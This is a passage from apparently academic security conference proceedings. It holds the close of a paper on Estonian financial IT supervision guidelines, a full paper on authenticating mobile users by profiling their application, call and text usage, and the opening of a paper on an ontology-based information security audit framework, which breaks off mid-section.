Requirements for organizing the business continuity process of supervised entities (2010).
The main practical outcome for Estonia of surveying European supervision requirements was the
indication to change two existing guidelines, i.e. requirements for the organization the field of information
technology and requirements for organizing the business continuity process and create one new, i.e.
requirements for the organization of the field of information security. It is true that guidelines give mostly
assurance for inherent risks in financial sector. For example, it is stated that there should be a
responsible person for information security and it is unclear for what concrete risks will be mitigated.
However, the guidelines are important to provide the basis for expectations of the supervision authority
and for obligations of the supervised entity. In this light, it is obvious that to assess the compliance with
these requirements and to monitor real risks, more detailed supervision approach is needed. Research
goes further to develop appropriate criteria handbook and assessment solutions for these purposes.
4. Discussion
Next some common findings, lessons learned and proposals are discussed. First, the proposed key
concept seems working, it means the common understanding in European level for regulations in
financial sector and IT field revolve around the given keywords.
305

Andro Kull
Risk assessment was mentioned in survey as the most critical issue to regulate. The following questions
rise in case the risk assessments by supervised entities and risk assessment by supervision authority
mismatch. To address such problems, the higher level risk management approaches are proposed like
Basel II and Solvency II. Named approaches deal with risk pricing and respective capital requirements.
One general question through the survey and supervision authority guidelines process was about the
mandate of regulative guidelines. Some European countries use “must”, the others use softer formulation
“shall”. Estonia decided to use “shall” form because of the range of the guidelines which covers bigger
banks and also small investment firms.
Connected question is the mandate of guidelines document – it is not a law, which is mandatory and it is
not a standard which is optional. Estonian approach is between of them and uses term “”comply or
explain”. The “comply or explain” principle should be taken into account in the application of these
guidelines: if necessary, a supervised entity shall be able to explain why it is not applying or is only partly
applying any of the paragraphs of these guidelines. Also timing of regulations is an discussion point. As
the new threats occur, the requirements may change and the question is what the right time for these
changes is. The possibilities may vary from long time period before and long time after. One example of
such new trends is security in cloud computing. The recommendations from ENISA (2011, p. 9) applied
for governments indicate the need for additional risk assessment in using cloud computing technologies
for critical information infrastructure. In Estonia, for example electronic banking is considered as essential
services and these are regulated by Emergency act (Estonian Ministry of the Interior, 2009).
As a wider conclusion, the regulations are to be a subject of continuous review and improvement.
Considering the whole research, one may ask if such complicated assessment approach is reasonable to
develop and implement if there are many alternatives to assess the subjects, for example CMM (2010)
naming one of the best known? The answer, which opens up the whole essence of the research and
solution for IT supervision in and is that we do not need to score the enterprises in financial sector, but
find out the most critical risk areas connected with IT inside of supervised entities.
In implementing IT supervision method, as described above, into practice, the proposal is more to
consider with external risks and try to continuously integrate them into the method.
References
Carnegie Mellon Software Engineering Institute (CMU/SEI) (1999) OCTAVE - Operationally Critical Threat, Asset,
and Vulnerability Evaluation Framework. Technical report, CMU/SEI-99-TR-017, ESC-TR-99-017.
Committee of Sponsoring Organizations (COSO) (2010) COSO framework. http://www.coso.org. Accessed at
10.08.2010.
Estonian Financial Supervision Authority (2010) Objective of Financial Supervision, [online],
http://www.fi.ee/index.php?id=580. Accessed at 26.04.2011.
Estonian Financial Supervision Authority (2010) Requirements for Organizing the Business Continuity Process of
Supervised Entities, [online], http://www.fi.ee/failid/Business_continuity.pdf. Accessed at 26.04.2011.
Estonian Financial Supervision Authority (2010) Requirements for the organization of the field of information security,
[online], http://www.fi.ee/failid/information_security.pdf. Accessed at 26.04.2011.
Estonian Financial Supervision Authority (2010) Requirements for the organization the field of information
technology, [online], http://www.fi.ee/failid/IT_governance.pdf. Accessed at 26.04.2011.
Estonian Ministry of the Interior (2009) Emergency Act, [online],
http://www.legaltext.ee/et/andmebaas/tekst.asp?loc=text&dok=XXXXX26&keel=en&pg=1&ptyyp=RT&tyyp=X&q
uery=h%E4daolukorra. Accessed at 26.04.2011.
European Network and Information Security Agency (2010) Security & Resilience in Governmental Clouds, Making
an informed decision, [online], http://www.enisa.europa.eu/act/rm/emerging-and-futurerisk/deliverables/security-and-resilience-in-governmental-clouds/at_download/fullReport.
Accessed at
27.01.2011.
Institute of Internal Auditors (2010) GAIT - A risk-based approach to assessing the scope of IT General Controls.
[online]. http://www.theiia.org/guidance/standards-and-guidance/ippf/practice-guides/gait/. Accessed at
21.06.2010.
ISACA (2010) COBIT - Control Objectives for Information and related Technology. https://www.isaca.org/. Accessed
at 29.03.2010.
SABSA (2010) SABSA - Sherwood Applied Business Security Architecture. http://www.sabsa.org/. Accessed at
17.08.2010.
Software Engineering Institute (1993) CMM – Capability Maturity Model, [online], http://www.sei.cmu.edu/index.cfm.
Accessed at 18.07.2010.
306

Behaviour Profiling for Transparent Authentication for Mobile
Devices
Fudong Li 1 , Nathan Clarke 1, 2 , Maria Papadaki 1 and Paul Dowland 1
1
University of Plymouth, UK
2
Edith Cowan University, Perth, Western Australia
info@cscan.org
Abstract: Since the first handheld cellular phone was introduced in 1970s, the mobile phone has changed
significantly both in terms of popularity and functionality. With more than 4.6 billion subscribers around the world, it
has become a ubiquitous device in our daily life. Apart from the traditional telephony and text messaging services,
people are enjoying a much wider range of mobile services over a variety of network connections in the form of
mobile applications. Although a number of security mechanisms such as authentication, antivirus, and firewall
applications are available, it is still difficult to keep up with various mobile threats (i.e. service fraud, mobile malware
and SMS phishing); hence, additional security measures should be taken into consideration. This paper proposes a
novel behaviour-based profiling technique by using a mobile user’s application usage to detect abnormal mobile
activities. The experiment employed the MIT Reality dataset. For data processing purposes and also to maximise the
number of participants, one month (24/10/2004-20/11/2004) of users’ application usage with a total number of 44,529
log entries was extracted from the original dataset. It was further divided to form three subsets: two intra-application
datasets compiled with telephone and message data; and an inter-application dataset containing the rest of the
mobile applications. Based upon the experiment plan, a user’s profile was built using either static and dynamic
profiles and the best experimental results for the telephone, text message, and application-level applications were an
EER (Equal Error Rate) of: 5.4%, 2.2% and 13.5% respectively. Whilst some users were difficult to classify, a
significant proportion fell within the performance expectations of a behavioural biometric and therefore a behaviour
profiling system on mobile devices is able to detect anomalies during the use of the mobile device. Incorporated
within a wider authentication system, this biometric would enable transparent and continuous authentication of the
user, thereby maximising user acceptance and security.
Keywords: mobile device, behaviour profiling, applications, transparent authentication
1. Introduction
The modern mobile handheld device is capable of providing many services through a wide range of
applications over multiple networks as well as on the handheld itself, such as: voice calling through
service provider’s network, Internet surfing via Wi-Fi hotspots, video conferencing through a 3G
connection, road navigating by GPS (Global Positioning System), picture sharing by using Bluetooth
pairing, data synchronising with laptop/desktop computers, document creation and modification, and
entertainment (i.e. playing music). Indeed, the functionality and interconnectivity of mobile devices only
tends to increase with time.
While people enjoy the convenience provided by mobile devices, there are also threats which could make
their life less comfortable, such as the loss or theft of the device, service fraud, SIM (Subscriber Identity
Module) card cloning, mobile malware, information disclosure, DoS (Denial-of-Service) attacks, Smishing
(SMS (Short Message Service) phishing) and Vishing (Voice phishing). Mobile malware could harm the
mobile phone in a variety of ways, such as: infecting files and damaging user data. Since discovered in
2004, there are more than 106 malware families with 514 variants having been identified (Securelist
2010). Smishing and Vishing are new types of phishing attacks which are performed by utilising text
messaging and telephone calls (FBI 2010). If the phone owner is fooled, its personal information can be
exposed and abused.
With the aim to counter mobile threats, a number of security mechanisms have been developed both on
the mobile device and the service provider’s network. The PIN (Personal Identification Number) based
authentication method is the most widely deployed approach on mobile devices. Although widely used,
many users do not employ the technique properly (i.e. never changing the PIN) (Clarke and Furnell 2005;
Kurkovsky and Syta 2010). Mobile antivirus software and firewall applications are mainly deployed for
detecting malware presence and blocking unwanted network traffic. Nonetheless, obtaining the latest
virus signatures and updating rules for network traffic are not easy tasks; furthermore, their ability to
detect user related activities is limited. As a mobile device has limited computing power, more
sophisticated mechanisms, such as IDS (Intrusion Detection System), are primarily deployed on the
service provider’s network. These systems monitor the mobile users’ calling and migration activities to
detect telephony service fraud. However, given the modern mobile device has the ability to access
307

Fudong Li et al.
several networks simultaneously and accommodate a wide range of services, existing network-based
security mechanisms are unable to provide comprehensive protection for the mobile handset. This paper
focuses upon presenting the findings from a feasibility study into utilising a host-based behavioural
profiling approach to identify mobile device misuse, and providing continued and transparent protection
for mobile devices.
This paper begins by introducing various mobile device applications, mobile threats, and general security
mechanisms and continues to describe the current state-of-the-art. A series of experimental studies on
two aspects of user’s applications usage (application-level and application-specific) are presented in
Section 3, with the following section describing the results. The paper then proceeds to discuss the
results and conclude with highlighting the future direction of the research.
2. Behaviour-based mobile device security mechanisms
Research in mobile device security has been an established area for more than 10 years with a
substantial amount of activity focused upon the areas of authentication, antivirus, firewalls, and IDS. Of
particular interest however is the research that has been undertaken in behaviour-based mechanisms.
This research falls primarily into two categories: behaviour-based network and behaviour-based host
mechanisms.
2.1 Behaviour-based network mobile security mechanisms
The research for studying mobile behaviour-based mechanisms started around 1995 mainly focusing
upon the area of IDS. These mobile IDSs monitor user calling and migration behaviour over the service
provider’s network, and detect telephony service fraud (Gosset 1998; Samfat and Molva 1997;
Boukerche and Nitare 2002). One particularly successful approach is based upon developing a profile of
users calling history over a period of time and comparing this historical profile against current usage, with
deviations above a predefined threshold resulting in an alarm. Various supervised and unsupervised
classifiers were successfully developed to deal with various attributes of the problem-space (known and
unknown attack vectors) and the resulting systems were combined so that the strengths of each
approach can be capitalised upon (Gosset 1998).
Research has also focused on the use of geo-location information as a basis for detecting misuse. Based
upon the hypothesis that people have a predictable travelling pattern, the migration based mobile IDS
monitors a user’s location activities to detect abnormal behaviour. The user’s location information can be
obtained either from the mobile cellular network (i.e. cell ID) or via a GPS link (i.e. longitude, latitude). By
recording the users’ location information over a time period, a mobility profile can be generated. When a
mobile user carries their device from one location to another, the probability of the event will be
calculated. If this surpasses a threshold, then the current event will be considered as an intrusion. A
number of studies have been carried out by profiling user migration activities, such as: Buschkes et al
1998, Hall et al 2005, and Sun et al 2006.
By studying a user’s calling or location activities, behaviour based IDSs can achieve a high detection rate
and offer the ability to detect unforeseen attacks. In addition, as the classification and identification
procedures are processed by the network service provider, it does not require any additional
computational power from the mobile device. This has traditionally been critical for mobile devices, as
they have limited processing power and space comparing with traditional desktop computers.
Nonetheless, if these behaviour-based systems work together to monitor the mobile user’s action (i.e.
calling a friend) while knowing where the action is taken (i.e. at home), an overall system performance
could arguably be increased.
2.2 Behaviour-based host mobile security mechanisms
Existing host behaviour-based mobile security systems are mainly authentication-based systems. These
systems usually employ one or more characteristics of a user’s behaviour to assess the legitimacy of the
current user – techniques include keystroke analysis and gait recognition.
Keystroke analysis based authentication systems monitor users’ keystroke patterns, typically monitoring
the inter-keystroke latency and hold-time. The authentication can be performed in two modes: static (text
dependent) and dynamic (text independent). In the static mode, users will be authenticated when a
specific word or phrase has been entered. For instance, the system will authenticate the user when they
enter a PIN to unlock their mobile devices. In the dynamic mode, a user’s legitimacy will be checked
308

Fudong Li et al.
based upon their typing speed and rhythm independent of what they type. For example, authentication
will transparently occur while the user composes a text message. Previous work in this area include
Clarke and Furnell (2006), Buchoux and Clarke (2008), and Campisi et al. (2009). With an average
experimental EER of 13%, keystroke analysis based authentication systems can be deployed in practice
to provide extra security for a mobile device. However, this method is only practical in scenarios with
sufficient keystroke activity (i.e. activities such as reading a document or viewing a picture would be
unlikely to generate sufficient data to successfully validate a users’ identity).
Gait recognition is based upon the theory that people can be discriminated by how people walk when
they carry their mobile device (Boyd and Little, 2005). When a user carries their mobile device in their
trouser pocket, the user’s gait information can be collected (Derawi et al 2010). The user’s gait data can
then be compared with an existing template. If it matches, the user is considered legitimate; otherwise,
they are an intruder. The experiment result shows that an EER of 20.1% can be achieved. It shows the
possibility to deploy this method on a mobile handset. However, as the authentication process is heavily
reliant on user’s gait information, this could leave the mobile device unprotected when gait information is
not available – for example when the user sits in the office.
2.3 Summary of current mobile behaviour security mechanisms
The aforementioned literature suggests that existing behaviour-based network IDSs can detect calling
service fraud attacks. However, in practice it can be seen that the mobile network operator can only
monitor calling and migration behaviours, rather than examining every single mobile service. For the
existing host-based behaviour authentication system, it could only provide periodically security when the
user interacts with the device in the desired manner (e.g. when the keypad is touched or the device is
carried in the back pocket). Therefore, none of the current research in mobile behaviour security
mechanisms provides a comprehensive and continuous protection against device misuse. Hence, a
mobile security mechanism which can offer detection across a wider range of services and connections
on the mobile device is needed.
3. Behaviour profiling for transparent authentication for mobile devices
The previous section shows that the network-based behavioural security mechanisms can only monitor
network-based services through the service provider’s network. As current mobile devices have the
ability to access multiple networks simultaneously, a host based approach must be taken into
consideration when designing the new system. With the difficulty of obtaining and updating the signatures
and the lack of the ability to detect unforeseen threats, a behaviour profiling technique should be taken.
As application usage represents an overview of how the user interacts with the device (Miettinen et al
2006), and due to the lack of research regarding the discriminatory nature of application usage within a
mobile device environment, an experiment was developed focussing upon two aspects: application-level
and application-specific user interactions.
3.1 Experiment procedure
The experiment employed a publicly available dataset provided by the MIT Reality Mining project (Eagle
et al 2009). The dataset contains 106 participants’ mobile phone activities from September 2004 to June
2005. By using preinstalled logging software, various mobile data attributes were collected from
participants’ using Nokia 6600 mobile phones. As shown in Table 1, the MIT Reality dataset contains a
large and varied selection of information which covers two levels of application usage: application-level
information (general applications) and application-specific information (voice call and Text message).
Table 1: The MIT Reality dataset
Activity Number of logs Information contains
General applications 662,393 Application name, date, time of usage and cell ID
Voice call 54,440 Date, time, number of calling, duration and cell ID
Text message 5,607 Date, time, number of texting and cell ID
3.1.1 Application-level analysis
By default, a number of common applications are preinstalled on the mobile device by the manufacture,
such as: phonebook, clock and voice calling. With increased computing processing power and storage
space and almost 15,000 new mobile applications becoming available on the market every month, mobile
309

Fudong Li et al.
users have the freedom of installing any additional applications on the device (Distimo 2010). From a
high-level perspective the general use of applications can provide a basic level of information on how the
mobile user utilises the device. Such basic information could be the name of the application, time, and
location of usage. Given the hypothesis that mobile users utilise their mobile applications differently (i.e.
two users utilise different applications in different time periods and at different locations), an experiment
was devised to explore the possibility of utilising application-level information for discriminating mobile
device users.
3.1.2 Application-specific analysis
The second experiment focussed upon utilising further information about the applications. Within many
applications the user connects to data that could provide additional discriminatory information. For
instance, when surfing the Internet, the Internet browser can capture all the URLs an individual accesses.
Unfortunately, due to limitations on the dataset (collected prior to data-based applications becoming
prevalent), the range of application-specific analysis that could be undertaken were limited to telephony
and text messaging.
The prior literature shows that calling behaviour has been studied several times in a network-based
environment with results demonstrating the ability to discriminate mobile phone users. Within a mobile
host environment, the availability of calling features does change slightly – for example, the IMSI
(International Mobile Subscriber Identity) is not a useful feature in a host-based solution. Furthermore,
although several studies suggested utilising a user’s location information, it was never been treated as a
calling feature. Therefore, it was interesting to identify the effectiveness of a new set of calling features,
which included the user’s location information.
Due to the enormous use of text messaging, with the UK alone sending more than 100 billion text
messages in 2010 (Ofcom 2010), the application is amongst the most widely used application on a
mobile device. Despite the high volume of text message usage, little research has been undertaken to
show how text messages may be used to detect abnormal usage in the mobile environment. Hence, it
was also deemed important to discover the possibility and usefulness of employing text messaging to
detect anomalous mobile user’s behaviours.
For methodological reasons: to maximise the number of participants within a reasonable timeframe, the
experiment employed 76 participants whose activities occurred during the period of 24/10/2004-
20/11/2004. As not all participants started or finished the experiment at the same time, it was imperative
to isolate a sub-section of the dataset that maximised the number of participants and available data. The
methodology employed two types of profile techniques: static and dynamic. For the static profiling, each
individual dataset was divided into two halves: the first half was used for building the profile, and the
other half was utilised for testing. For the dynamic profiling, the profile contained 7/10/14 days of the
user’s most recent activities; the evaluation process was carried out on the same sub-dataset as for the
static experiment in order to provide a meaningful comparison. Given the highly variable nature of the
input data a smoothing function was applied. Rather than taking each individual result, the smoothing
function permitted the system to make a decision after a number of results were present (similar to a
winner-takes-all decision-based biometric fusion model). The basis for this approach was derived from
the descriptive statistics produced when analysing the data and the large variances observed. A dynamic
approach therefore seemed sensible to cope with the changing nature of the profile. Based on the
premise that the historical profile can be used to predict the probability of a current event, the following
formula illustrated in Equation 1 was devised. The equation also includes a weighting factor to allow for
more discriminative features to have a greater contribution (Wi) within the resulting score than less
discriminative features. Moreover, the equation also provides a mechanism to ensure all outputs are
bounded between 0 and 1 to assist in defining an appropriate threshold.
Where:
Equation 1: Alarm if: ≥threshold
i=The features of one chosen application (i.e. dialled number for telephony application)
310

Fudong Li et al.
x=The value of Featurei (i.e. office telephone number and home telephone number)
M=Total number of values for Featurei
N=Total number of features
Wi=The weighting factor associated with Featurei ( )
Threshold= A predefined value according to each individual user
4. Experimental results
4.1 Application-level profiling
For the general applications, the following features were extracted from the dataset: application name,
date of initiation, and location of usage. As a total of 101 individual applications were used among the
chosen 76 users during the chosen period, a final sub-dataset for application-level applications with
30,428 entry logs was formed. Among these 101 applications, the phonebook, call logs and camera were
used by all participants. By using the proposed mathematical equation, a final set of EER’s (Equal Error
Rate) for users’ application-level usage is presented in Table 2. The best EER is 13.5% and it was
obtained by using the dynamic profile technique with 14 days of user activity with 6 log entries. In
comparison, the worst performance was achieved by using the dynamic profile technique with 7 days of
user activities with 1 log entry.
Table 2: Experimental results for application-level applications
Profile
technique
Number of log entries
1 2 3 4 5 6
Static 14 days 21.1% 17.4% 16.3% 14.9% 14.2% 13.6%
Dynamic 14 days 21.1% 17.3% 16.0% 14.5% 13.9% 13.5%
Dynamic 10 days 22.1% 17.8% 16.2% 14.6% 14.4% 13.7%
Dynamic 7 days 24.0% 19.4% 17.6% 15.9% 15.3% 14.4%
Selected experimental results for the best configuration of application-level usage are shown in Table 3.
The top 3 and bottom 3 users’ EERs represent the best and worst performance respectively. Further
analyses of the results show that 84% of all users have an EER less than 20%.
Table 3: Selected users’ performance for application-level applications with dynamic 14 days and 6 log
entries
4.2 Application-specific profiling
4.2.1 Telephony
User_ID EER
71 0%
46 0%
12 0.5%
66 37.5%
2 39.3%
68 51.6%%
For the telephone call application, a subset of 71 users from the 76 participants used the application
during the aforementioned chosen period. During the same period, 2,317 unique telephone numbers
were dialled and the total number of calls made was 13,719. From iteration and optimisation, the
following features were chosen for each log: the telephone number, date and location of call. By using
the aforementioned mathematical formula with the selected features (all features were given the same
weighting factor), a final set of experiment results is shown in Table 4. The best result is an EER of 5.4%
and it was achieved by using the dynamic profile technique with user’s most recent 14 days activity and 6
log entries.
311

Fudong Li et al.
Table 4: Experimental results for telephone call application
Profile technique
Number of log entries
1 2 3 4 5 6
Static 14 days 9.6% 9.1% 7.9% 7.2% 4.3% 6.4%
Dynamic 14 days 8.8% 8.1% 6.4% 6.4% 6.3% 5.4%
Dynamic 10 days 9.6% 8.6% 8.1% 7.2% 6.9% 6.0%
Dynamic 7 days 10.4% 8.8% 8.5% 7.3% 7.0% 6.2%
A selection of experimental results for the best set up of the telephone call application is presented in
Table 5. The best and worst performances for selected users are the top 3 and bottom 3 users
accordingly. Furthermore, 81.7% of users have an EER less than 10%.
Table 5: Selected users’ performance for telephone call application with Dynamic 14 days and 6 log
entries
User_ID Performance
23 0%
43 0%
61 0%
64 20.6%
50 23.1%
8 39.5%
4.2.2 Text messaging
For the text messaging experiment, 22 users’ text messaging activities were available from the 76
participants, during the chosen period. The text messaging dataset contains 1,382 logs and 258 unique
texting numbers. For each text log, the following features were extracted: receiver’s telephone number,
date and location of texting. Due to certain participants having limited numbers of text messaging logs; a
maximum of 3 log entries were treated as one incident. By employing the aforementioned mathematical
formula and all text message’s features (all features were given the same weighting factor), the final
result for user’s text messaging application is shown in Table 6. The best result was an EER of 2.2% and
it was acquired by utilising the dynamic profile method with 14 days of user’s activities and 3 log entries.
Also, the performance improves considerably from 1 log entry to 2 log entries across all profiling
techniques.
Table 6: Experimental results for text messaging application
Number of log entries
1 2 3
Profile technique
Static 14 days 7.0% 4.3% 3.6%
Dynamic 14 days 5.7% 2.6% 2.2%
Dynamic 10 days 8.3% 4.1% 3.7%
Dynamic 7 days 10.7% 5.7% 3.8%
Table 7 shows a group of users’ performance for the best configuration of the text messaging application.
The top 3 and bottom 3 users’ EERs represent the best and worst performance respectively. In addition,
95.5% of all users have an EER smaller than 10%.
Table 7: Selected users’ performance for text messaging application with Dynamic 14 days and 6 log
entries
User_ID Performance
13 0%
14 0%
18 0.2%
4 5.3%
2 8.4%
17 13.1%
312

5. Discussion
Fudong Li et al.
The application name and location have proved valuable features that can provide sufficient
discriminatory information to prove useful in authentication. However, whilst this might identify many
misuse scenarios, it would not necessary identify all cases of misuse – particular those where a
colleague might temporarily misuse your device as the location information is likely to fall within the same
profile as the authorised user. So care is required in interrupting these results. The intra-application
approach should also help to specifically identify this type of misuse.
In general, dynamic profiling achieved a slightly better performance than the static profiling did. This is
reasonable as a dynamic profile contains a user’s most recent activities; hence it obtains a more accurate
detection. Furthermore, with a longer training set period, the performance is also improved. Hence, an
increased number of days (i.e. 18/22 days) of user activities as the training set should be examined to
find the optimum solution. Nonetheless, literature suggests users do change their usage pattern over a
long period of. A study by Flurry (2009) states that users only keep 67% of the applications over a 30
days period. Moreover, storage and processing issues should also be taken into consideration with larger
training. While a smoothing function treated more log entries as one incident, the performance also
improved accordingly. The smoothing function reduces the impact any single event might have and
seeks to take a more holistic approach to monitoring for misuse. The disadvantage of this approach is
that it takes a longer time for the system to make a decision; hence, an intruder could have more
opportunities to abuse a system and a certain amount of abuse could be missed by the security control.
Limitations in the dataset are also likely to have created certain difficulties. As the dataset was collected
in 2004, the number of mobile applications available for users to choose was limited; this resulted in a
large similarity of application-level application usage between mobile users and difficulty for any
classification methods. In contrast, in the early part of 2010, there were around 200,000 mobile
applications available (Distimo 2010). As mobile users have more options, their application-level usage
would arguably differ larger. Therefore, it would be easier to discriminate mobile users through their
application-level usage.
As shown by Table 4, the performance of the telephony application is very good – more than twice that of
the application-level profiling. This reinforces the hypothesis that knowing both the application and what
the user does with it, improves the chance of identifying individual users significantly. Moreover, mobile
users had a far larger set of telephone contacts (the numbers they can dial) compared with the number of
applications they had also makes the classification process easier because there are more identifiable
data points from which to discriminate. In comparison with other biometric authentication techniques such
as keystroke analysis, which has an average EER of 8%, the telephone experiment is within that
category of performance (Clarke and Furnell 2006).
As presented in Table 6, the results from the text messaging application were even better than those
achieved by the telephone call application, albeit with a smaller dataset. This may be caused by people
only sending text messages to very close contacts. Although only 30% of the participants used the text
messaging application in 2004, the situation has changed considerably: for UK alone, the volume of text
messaging traffic has increased by 290% since 2004 (Ofcom 2010). This indicates that the text
messaging based authentication method could serve a good proportion of the mobile users’ population.
From the results presented in this paper, it can be shown that both application-level and applicationspecific
information can be used to authenticate mobile users. In addition, although it is more difficult to
profile certain users, more than 81% of all users’ performance was within the bounds of a behaviourbased
biometric. Dynamic-based profiling technique provides the opportunity to develop a more
meaningful profile of user activities. This does however raise issues with regards to template aging and
ensuring the samples utilised in creating the template are all legitimate that will need to be addressed.
Furthermore, in comparison with previous research, which used computationally complicated neural
networks as the classification method (Li et al 2009; Li et al 2010), this approach employed a light weight
mathematical formula which saves a significant amount of processing power and storage space; this is
essential for handheld mobile devices as they have limited processing power and storage space.
6. Conclusions
The experiment shows that with an EER of 5.4%, 2.2% and 13.5% for the telephony, text messaging and
general application usage respectively, and these techniques are viable for a behaviour-based
313

Fudong Li et al.
authentication mechanism within the mobile environment. The authentication process could be carried in
the background while mobile users utilise their applications; if several abnormal activities occurred within
a fixed time frame, further security methods would be initiated according to the level of the incident.
Future work will focus upon designing an authentication architecture that could accommodate the
aforementioned behaviour based authentication techniques. As the architecture works behind the scene,
little attention would be required from the mobile user and an intervention would only be needed when
anomalous application usage occurs. Hence, such an architecture would provide a transparent and
continuous protection for users. Furthermore, an operational system, which supports identity verification,
will be developed for the purpose of evaluation.
References
Boukerche, A. and Nitare, M.S.M.A. (2002) “Behavior-Based Intrusion Detection in Mobile Phone Systems”, Journal
of Parallel and Distributed Computing, vol. 62, Issue 9, pp. 1476-1490, Academic Press, Inc. Orlando, FL, USA
Boyd, J.E., and Little, J.J. (2005) “Biometric gait recognition”, Advanced Studies in Biometrics: Summer School on
Biometrics, pp19-42, 2005, LCNS
Buchoux A, Clarke NL (2008) Deployment of Keystroke Analysis on a Smartphone, Proceedings of the 6th Australian
Information Security & Management Conference, 1-3 December, Perth, Australia
Buschkes, R., Kesdogan, D. and Reichl, P. (1998) “How to increase security in mobile networks by anomaly
detection”, Proceedings of the 14th Annual Computer Security Applications Conference, pp. 3-12. IEEE
Computer Society, Washington, DC, USA
Campisi, P., Maiorana, E., Bosco, M.L., Neri, A. (2009) "User authentication using keystroke dynamics for cellular
phones", IET Signal Processing, Vol.3 No.4 pp333-41
Clarke, N.L. and Furnell, S.M. (2005) “Authentication of users on Mobile Telephones – A Survey of Attitudes and
Practices”, Computer & Security, 24(7), pp.519-527
Clarke, N.L. and Furnell, S.M. (2006) “Authenticating Mobile Phone Users Using Keystroke Analysis”, International
Journal of Information Security, ISSN:1615-5262, pp.1-14
Derawi, M.O., Nickel, C., Bours, P., and Busch, C. (2010) "Unobtrusive User-Authentication on Mobile
Phones Using Biometric Gait Recognition," Sixth International Conference on Intelligent Information
Hiding and Multimedia Signal Processing, 2010
Distimo, (2010) “Our Presentation From Mobile World Congres 2010 – Mobile Application Stores State Of Play”,
[online], http://blog.distimo.com/2010_02_our-presentation-from-mobile-world-congres-2010-mobile-applicationstores-state-of-play/,
date accessed: 17 January 2011Eagle, N., Pentland, A. and Lazer, D. (2009) “Inferring
Social Network Structure using Mobile Phone Data”, Proceedings of the National Academy of Sciences
(PNAS), vol 106, pp.15274-15278.
FBI (2010) “Smishing and Vishing”, [online], http://www.fbi.gov/news/stories/2010/november/
cyber_112410/cyber_112410, date of access: 02/12/2010
Flurry (2009) “Mobile Apps: Models, Money and Loyalty”, [online], http://blog.flurry.com/bid/26376/ Mobile-Apps-
Models-Money-and-Loyalty, date accessed: 26 January 2011
Gosset, P. (1998) “ASPeCT: Fraud Detection Concepts: Final Report”, Doc Ref. AC095/VOD/W22/DS/P/18/1
Hall, J., Barbeau, M. and Kranakis, E. (2005) “Anomaly-based intrusion detection using mobility profiles of public
transportation users”, the Proceeding of IEEE International Conference on Wireless And Mobile Computing,
Networking And Communications, 2005 (WiMob'2005), vol. 2, pp.17-24.
Kurkovsky, S. and Syta, E. (2010) “Digital natives and mobile phones: A survey of practices and attitudes about
privacy and security”, In Proceedings of the 2010 IEEE International Symposium on Technology and Society
(ISTAS), pp. 441-449
Li, F., Clarke, N.L. and Papadaki, M. (2009) “Intrusion DetectionSystem for Mobile Devices: Investigation on Calling
Activity”, Proceedings of the 8th Security Conference, April, Las Vegas, USA
Li, F., Clarke, N.L., Papadaki, M. and Dowland, P.S. (2010) “Behaviour Profiling on Mobile Devices”, International
Conference on Emerging Security Technologies, 6-8 September, Canterbury, UK, pp.77-82
Miettinen, M., Halonen, P., and Hatonen, K. (2006) “Host-based intrusion detection for advanced mobile devices”,
Proceedings of the 20 th International Conference on Advanced Information Networking and Applications (AINA’
06), pp 72-76
Ofcom, (2010) “Communications Market Report, 2010”, [online],
http://stakeholders.ofcom.org.uk/binaries/research/cmr/753567/CMR_2010_FINAL.pdf, date accessed: 20
December 2010
Samfat, D. and Molva, R. (1997) “IDAMN: an Intrusion Detection Architecture for Mobile Networks”, IEEE Journal on
Selected Areas in Communications, vol. 15, pp.1373-1380.
Securelist, (2010) “Mobile Malware Evolution: An Overview, Part 3”, [online],
http://www.securelist.com/en/analysis?pubid=204792080, date of access: 03/12/2010
Sun, B., Chen, Z., Wang, R., Yu, F. and Leung, V.C.M. (2006) “Towards adaptive anomaly detection in cellular
mobile networks”, the IEEE Consumer Communications and Networking Conference, 2006 (CCNC 2006), Vol.
2, pp. 666-670, IEEE
314

Description of a Practical Application of an Information
Security Audit Framework
Teresa Pereira 1 and Henrique Santos 2
1
Polytechnic Institute of Viana do Castelo, Valença, Portugal
2
University of Minho, Guimarães, Portugal
tpereira@esce.ipvc.pt
hsantos@dsi.uminho.pt
Abstract: Organizations are increasingly relying on information systems to enhance business operations, facilitate
management decision-making, and deploy business strategies. This dependence has increased in current business
environments where a variety of transactions involving exchange of information and services are accomplished
electronically. The technological advances, the increases use of the Internet, the emergence of the Internet-enabled
services and the current audit environment has promoted a growing interest in the continuously deployment of
auditing information system security, in order to ensure the reliability of the organizational information systems.
However the current approaches available to assist the auditor to perform a security audit is limited concerning the
used concepts and it is increasingly dependence on the experience and knowledge of the auditor. This paper intends
to present a developed framework, which is based on a conceptual model to assist the auditor to conduct an auditing
in the information system security domain. The model developed contains the semantic concepts its relationships
and axioms, defined in a subset of the information security domain. This conceptual approach promotes the
standardization of the terminology used in the security information domain and to improve the information system
security audit process within organizations. Comparisons of the current available approaches to audit information
systems will be presented as well.
Keywords: auditing information system security, Information system security, ontology, COBIT, ITIL and concepts
1. Introduction
Nowadays the organizations are increasingly relying on information system to achieve business
objectives. The business performance involves the full investment of business process owners, since
they have total responsibility for all issues regarding the business process, in particular providing
adequate security controls. As a result increasing emphasis has been placed on internal security controls
in organizations, in order to reduce risks to an acceptable level. Information system security audit is the
process of gathering and evaluating evidence based on the evaluation of the information systems
performance. Furthermore it enables to determine whether information system promotes effective
achievement of business objectives and whether system resources are used in an efficient manner.
Therefore auditors are continuously confronted with the need to cooperate with their opinion on internal
control to management. In this context it is fundamental to the auditors a framework to assist them to
substantiate their view on internal controls.
The development of information systems security auditing frameworks is the result of a joint study of IT
expertises in response to the growing significance of best practices to the IT industry and the need for IT
managers to better understand the value of IT best practices frameworks and how to implement them.
The most effective best practices should be applied within the business context, focusing on their use to
provide the most benefit to the organization. The two most well-known frameworks are the IT
Infrastructure Library (ITIL) and the Control Objectives for IT (COBIT) which support a broad range of
management services and have been implemented by thousands of organizations. In this paper it is
established a comparison between these two methodologies with a new developed framework, which is
based on the established security standards ISO/IEC_JTC1 1 (ISO/IEC_JTC1 2005) and implemented to
assist auditor to perform regular audits to the organizational information system security. The paper is
structured as follows: in the section 2 we briefly introduces a description of the COBIT framework; section
3 presents the description of ITIL; section 4 presents the developed framework to audit information
systems security, based on the ontology structure; section 5 is performed a comparison between the
COBIT and ITIL, with the framework developed; conclusions and future work are presented in section 6.
1 International Organization for Standardization (ISO)/ International Electrotechnical Commission (IEC), Joint Technical Committee
(JTC 1)
315

2. COBIT
Teresa Pereira and Henrique Santos
COBIT is published by IT Governance Institute (ITGI) 2 and positioned as a high-level governance and
